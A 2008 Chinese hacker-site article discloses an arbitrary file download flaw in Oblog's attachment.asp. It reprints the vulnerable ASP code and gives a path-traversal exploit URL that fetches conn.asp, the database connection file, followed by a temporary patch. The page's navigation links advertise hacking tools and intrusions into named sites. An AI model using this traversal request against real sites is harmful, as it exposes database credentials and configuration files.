·	Oblog漏洞五一重现	05-04	·	跨站脚本－攻击和防御指	05-04
·	两个shellcode	05-04	·	代理工具：CTProxy 1.0	05-04
·	强悍挂马工具：IIS_AD I	05-04	·	Windows XP with SP3 VO	05-04
·	易美网络提供1000M网络免	05-04	·	终点免费空间提供100M免	05-04
·	Vista中新增命令完整版	05-01	·	Windows系统中的“普通人	05-01
·	oxyhostsfree.com提供5G	05-01	·	实用技巧玩转Vista下备	04-29
·	V9站长天空提供200M高速	04-29	·	用WinHEX远程查杀顽固病	04-28
·	js下载者	04-28	·	又一个MS08-025溢出工具	04-28
·	MS08-025 for win2k & w	04-28	·	WEB暴力破解工具(wvs fu	04-28
·	最近比较流行的数据库挂	04-28	·	攻击木马–远程控制软件	04-28
·	仿SQLTOOLS 写的一个工具	04-28	·	输入小助手.vbs	04-28
·	logtamper-v1.0 修改lin	04-28	·	nasl插件生成器（带源码	04-28
·	OBlog 的SQL注入漏洞检测	04-28	·	经典Windows XP系统故障	04-28
·	全民红客 CNN攻击技术解	04-28	·	megalogs提供300MB免费p	04-28

[注意]Oblog漏洞五一重现

荐 ★★★★★

Oblog漏洞五一重现

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-4 11:13:36

Sub downloadFile(strFile,stype)
On Error Resume Next
Server.ScriptTimeOut=9999999
Dim S,fso,f,intFilelength,strFilename
strFilename = strFile
Response.Clear
Set s = Server.CreateObject(oblog.CacheCompont(2))
s.Open
s.Type = 1
Set fso = Server.CreateObject(oblog.CacheCompont(1))
If Not fso.FileExists(strFilename) Then
If stype = 0 Then
Response.Status=404
Response.Write “该附件已经被删除!”
Exit Sub
Else
strFilename = Server.MapPath(blogdir&”images/nopic.gif”)
End if
End If
Set f = fso.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
If Err Then
Response.Write(”<h1>错误: </h1>” & Err.Description & “<p>”)
Response.End
End If
Set fso=Nothing
Dim Data
Data=s.Read
s.Close
Set s=Nothing
Dim ContentType
select Case LCase(Right(strFile, 4))
Case “.asp”,”.mdb”,”.config”,”.js” ‘Tr4c3 标注：再看这里，想起来什么来了？对了，前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com /post/306.html]，利用方法也相似，神奇的”.”又派上用场了。
Exit Sub
Case “.asf”
ContentType = “video/x-ms-asf”
Case “.avi”
ContentType = “video/avi”
Case “.doc”
ContentType = “application/msword”
Case “.zip”
ContentType = “application/zip”
Case “.xls”
ContentType = “application/vnd.ms-excel”
Case “.gif”
ContentType = “image/gif”
Case “.jpg”, “jpeg”
ContentType = “image/jpeg”
Case “.wav”
ContentType = “audio/wav”
Case “.mp3″
ContentType = “audio/mpeg3″
Case “.mpg”, “mpeg”
ContentType = “video/mpeg”
Case “.rtf”
ContentType = “application/rtf”
Case “.htm”, “html”
ContentType = “text/html”
Case “.txt”
ContentType = “text/plain”
Case Else
ContentType = “application/octet-stream”
End select
If Response.IsClientConnected Then
If Not (InStr(LCase(f.name),”.gif”)>0 Or InStr(LCase(f.name),”.jpg”)>0 Or InStr(LCase(f.name),”.jpeg”)>0 Or InStr(LCase(f.name),”.bmp”)>0 Or InStr(LCase(f.name),”.png”)>0 )Then
Response.AddHeader “Content-Disposition”, “attachment; filename=” & f.name
End If
Response.AddHeader “Content-Length”, intFilelength
Response.CharSet = “UTF-8″
Response.ContentType = ContentType
Response.BinaryWrite Data
Response.Flush
Response.Clear()
End If
End Sub

########################################################################
利用方法：
http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
修补建议：
等待官方发布新的补丁程序。
########################################################################
临时解决办法：
将attachment.asp第5行 Path = Trim(Request(”path”)) 改成 Path = Replace(Trim(Request(”path”)),”..”,”")
########################################################################

上一页 [1] [2]

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：对偶偶娱乐分站服务器的安全检测

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

对偶偶娱乐分站服务器的安全检测	04-23
入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26
BBSXP2008存在后台注射漏洞	02-19